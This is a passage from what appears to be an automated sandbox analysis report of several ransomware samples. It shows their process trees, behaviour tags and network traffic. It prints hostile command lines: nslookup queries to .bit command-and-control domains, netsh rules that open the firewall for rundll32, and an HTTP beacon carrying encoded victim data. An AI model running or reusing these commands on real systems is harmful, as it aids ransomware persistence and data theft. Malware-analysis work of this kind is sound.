        PID:10624
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10632
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10640
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10648
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10656
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10664
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10672
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10680
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10688
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10696
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10704
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10712
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10720
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10732
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10740
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10748
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10756
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10764
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10772
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10780
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10788
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10796
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10804
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10812
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10820
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10828
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10836
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10844
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10852
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10860
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10868
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10876
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10884
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10892
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10900
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10908
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10916
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10924
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10932
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10940
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10948
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10956
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10964
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10972
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10980
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10988
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10996
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11004
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11012
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11020
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11028
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11036
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11044
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11052
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11060
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11068
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11076
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11084
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11092
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11100
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11108
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11116
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11124
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11132
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11140
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11148
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11156
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11164
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11172
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11180
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11188
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11196
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11204
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11212
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11220
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11228
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11236
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11244
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11252
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11260
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:10728
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11272
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11280
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11288
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11296
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11304
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11312
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11320
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11328
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11336
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11344
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11352
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11360
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11368
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11376
        
        C:\Windows\SysWOW64\svchost.exe
        
        C:\Windows\SysWOW64\svchost.exe
        8⤵
        
        PID:11384
- C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
  HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Windows\T608060874566080\winsvcs.exe
    C:\Windows\T608060874566080\winsvcs.exe
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - System Location Discovery: System Language Discovery
    PID:2636
- C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.Win32.Crypmod.gen-62995e2a5c4384054be5df6c4559a9ddc407b3d02110039213e702085320c22a.exe
  HEUR-Trojan-Ransom.Win32.Crypmod.gen-62995e2a5c4384054be5df6c4559a9ddc407b3d02110039213e702085320c22a.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:1484
- C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
  HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:596
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1820
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2972
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2960
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2644
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:984
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1320
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2876
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:948
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1340
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2712
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:776
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1140
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1656
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2008
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2100
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1788
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2536
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1580
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2120
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3008
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2132
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2748
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1988
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1984
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3004
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1248
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2612
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1488
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2348
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2096
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2656
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2428
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns2.wowservers.ru
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns2.wowservers.ru
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup ransomware.bit ns1.wowservers.ru
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup carder.bit ns1.wowservers.ru
    3⤵
    PID:10316
- C:\Users\Admin\Desktop\00353\HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe
  HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1508
- C:\Users\Admin\Desktop\00353\Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe
  Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  PID:468
- C:\Users\Admin\Desktop\00353\Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
  Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of WriteProcessMemory
  PID:2464
- - C:\Users\Admin\Desktop\00353\Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
    Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
    3⤵
    - Modifies firewall policy service
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies WinLogon
    - System Location Discovery: System Language Discovery
    PID:772
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\fastrec.dll",fastrec C:\Users\Admin\Desktop\00353\Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
      4⤵
      Loads dropped DLL
      PID:2476
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2372
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Rundll32" dir=in action=allow protocol=any program="C:\Windows\system32\rundll32.exe"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2348
- C:\Users\Admin\Desktop\00353\Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
  Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of UnmapMainImage
  PID:860
- C:\Users\Admin\Desktop\00353\Trojan-Ransom.Win32.Shade.pkb-c80df024a87872e53a1df50061079e2e973673c68fc81dbdfd79d989dd8212b5.exe
  Trojan-Ransom.Win32.Shade.pkb-c80df024a87872e53a1df50061079e2e973673c68fc81dbdfd79d989dd8212b5.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of UnmapMainImage
  PID:1732

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2224

Network

DNS

brb.3dtuts.by

Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

Remote address:

8.8.8.8:53

Request

brb.3dtuts.by

IN A

Response

brb.3dtuts.by

IN A

185.84.108.232
GET

http://brb.3dtuts.by/ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603a2e3f32343f3c753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a3528343675160812177519373438303e29753c3e35763f3d6f6d3f6c3a6a683d396d6838693a6c6e6c6e3a6d6e6b3963683a6b626b3d696f3a3e6a39636c6d6d393e6b6b6f3a6f386b3f3a683e69383d62693a3a3d62753e233e60131e0e09760f2934313a3576093a3528343675160812177518292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e60131e0e09760f2934313a3576093a352834367516081217751c3a353f1829222b2f753c3e3576626d696e6f6b6a6c38686b693f3d3a62396f6338383e3a6a623d6e3a6b63623f383f63636b6c3863383a63396e626e6338686c683a6b6f39633a6b6c3e6a383e753e233e60131e0e09760f2934313a3576093a35283436750c323568697519373438303e29753c3e3576696e626d62696d626f6f6a6e6f3d6b6a6f6c6c3d396e6a3d696a3f6f633e3e38686c3d3a63626c6d396a68623a62383a63696268393d386e696c623d3e386f62753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3e353e2932387669623f6c6c383d6a633f3a3a3e633e6d686b6f386d6a3d6238693f3d3f6969393a6a696f6e6c6d3962623e6a626b3a3a68626e6e6969696e3d3a393d6f626d3a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b30397638636b3f3d6b696f3a636c636c693e6e683a6a3f3d6e6b6b6d6a6b6c623e693e626c686d6c68386d633d38636a3f393f3d3f6c623f6263623f3f63696a69396e753e233e600f2934313a3576093a35283436750c3235686975083a3c3e1829222b2f753f2a2a766b3f6f3a3f3e6e3e39696868636d393a38686d6e6b3e3e3f6d3f6c3e6338686a6a3f62383d38686262396e6b6d6c6f3e636f63623a6e6869633838386e633e3a753e233e

Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

Remote address:

185.84.108.232:80

Request

